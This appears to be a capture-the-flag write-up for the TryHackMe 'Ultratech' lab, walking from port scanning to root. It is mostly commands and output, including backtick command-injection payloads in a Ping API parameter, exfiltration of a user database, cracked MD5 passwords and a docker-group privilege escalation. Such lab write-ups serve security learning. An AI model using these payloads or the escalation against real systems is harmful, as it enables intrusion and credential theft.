# CTF TryHackMe - Ultratech

## Nmap

```bash
nmap -sC -sV -oN nmap.log 10.10.46.165
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-19 08:53 CET
Nmap scan report for 10.10.46.165
Host is up (0.073s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 dc:66:89:85:e7:05:c2:a5:da:7f:01:20:3a:13:fc:27 (RSA)
|   256 c3:67:dd:26:fa:0c:56:92:f3:5b:a0:b3:8d:6d:20:ab (ECDSA)
|_  256 11:9b:5a:d6:ff:2f:e4:49:d2:b5:17:36:0e:2f:1d:2f (ED25519)
8081/tcp open  http    Node.js Express framework
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
|_http-cors: HEAD GET POST PUT DELETE PATCH
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.73 seconds
```

Perform also an nmap scan on all ports

```bash
nmap -p- -v 10.10.46.165       
Scanning 10.10.46.165 [65535 ports]
Discovered open port 22/tcp on 10.10.46.165
Discovered open port 21/tcp on 10.10.46.165
Discovered open port 31331/tcp on 10.10.46.165
```

Let's see more informations about the 31331 port

```bash
nmap -p31331 -sC -sV 10.10.46.165
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-19 09:02 CET
Nmap scan report for 10.10.46.165
Host is up (0.051s latency).

PORT      STATE SERVICE VERSION
31331/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: UltraTech - The best of technology (AI, FinTech, Big Data)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.70 seconds
```

## Using gobuster to enumerate port 8081

```
gobuster dir --url http://10.10.46.165:8081/  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster_api.log
/auth                 (Status: 200) [Size: 39]
/ping                 (Status: 500) [Size: 1094]
/Ping                 (Status: 500) [Size: 1094]
```

## Check 31331 port

```
http://10.10.46.165:31331/robots.txt
Allow: *
User-Agent: *
Sitemap: /utech_sitemap.txt
```

```
http://10.10.46.165:31331/utech_sitemap.txt
/
/index.html
/what.html
/partners.html
```

On **http://10.10.46.165:31331/partners.html** we get a login page.

## Using burp to manipulate request login

I intercepted a request using API

```
http://10.10.46.165:8081/Ping?ip=xx.xx.xx.xx
```

## Trying to command injection

```
http://10.10.46.165:8081/Ping?ip=10.9.188.66`ls`
ping: utech.db.sqlite: Name or service not known 
```

We see a database file. Let's download this one

## Download and Analyse de sqlite file

```
10.10.46.165:8081/Ping?ip=10.9.188.66`python3%20-m%20http.server`
```

On my kali machine :

```bash
wget http://10.10.46.165:8000/utech.db.sqlite
```
Let inspect what's inside the sqlite file

```
sqlite3 utech.db.sqlite                                                                                                                             
SQLite version 3.36.0 2021-06-18 18:36:39
Enter ".help" for usage hints.
sqlite> .dump
PRAGMA foreign_keys=OFF;
BEGIN TRANSACTION;
CREATE TABLE users (
            login Varchar,
            password Varchar,
            type Int
        );
INSERT INTO users VALUES('admin','0d0ea5111e3c1def594c1684e3b9be84',0);
INSERT INTO users VALUES('r00t','f357a0c52799563c7c7b76c1e7543a32',0);
COMMIT;
```

Go **https://crackstation.net/** to crack hashes

```
f357a0c52799563c7c7b76c1e7543a32	md5	n100906
0d0ea5111e3c1def594c1684e3b9be84	md5	mrsheafy
```

So we have these credentials :

```
admin:mrsheafy
r00t:n100906
```

## SSH Access as r00t

```
ssh r00t@10.10.46.165
password:n100906

r00t@ultratech-prod:~$ id
uid=1001(r00t) gid=1001(r00t) groups=1001(r00t),116(docker)
```

## PrivEsc

r00t user is part of **docker** group. Let's abuse of this, to launch container with mounted **/** partion 

```bash
r00t@ultratech-prod:/$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh

# id
uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),6(disk),10(uucp),11,20(dialout),26(tape),27(sudo)
# cd /root
# ls -la
total 40
drwx------  6 root root 4096 Mar 22  2019 .
drwxr-xr-x 23 root root 4096 Mar 19  2019 ..
-rw-------  1 root root  844 Mar 22  2019 .bash_history
-rw-r--r--  1 root root 3106 Apr  9  2018 .bashrc
drwx------  2 root root 4096 Mar 22  2019 .cache
drwx------  3 root root 4096 Mar 22  2019 .emacs.d
drwx------  3 root root 4096 Mar 22  2019 .gnupg
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-------  1 root root    0 Mar 22  2019 .python_history
drwx------  2 root root 4096 Mar 22  2019 .ssh
-rw-rw-rw-  1 root root  193 Mar 22  2019 private.txt
```

And we are root ! :D

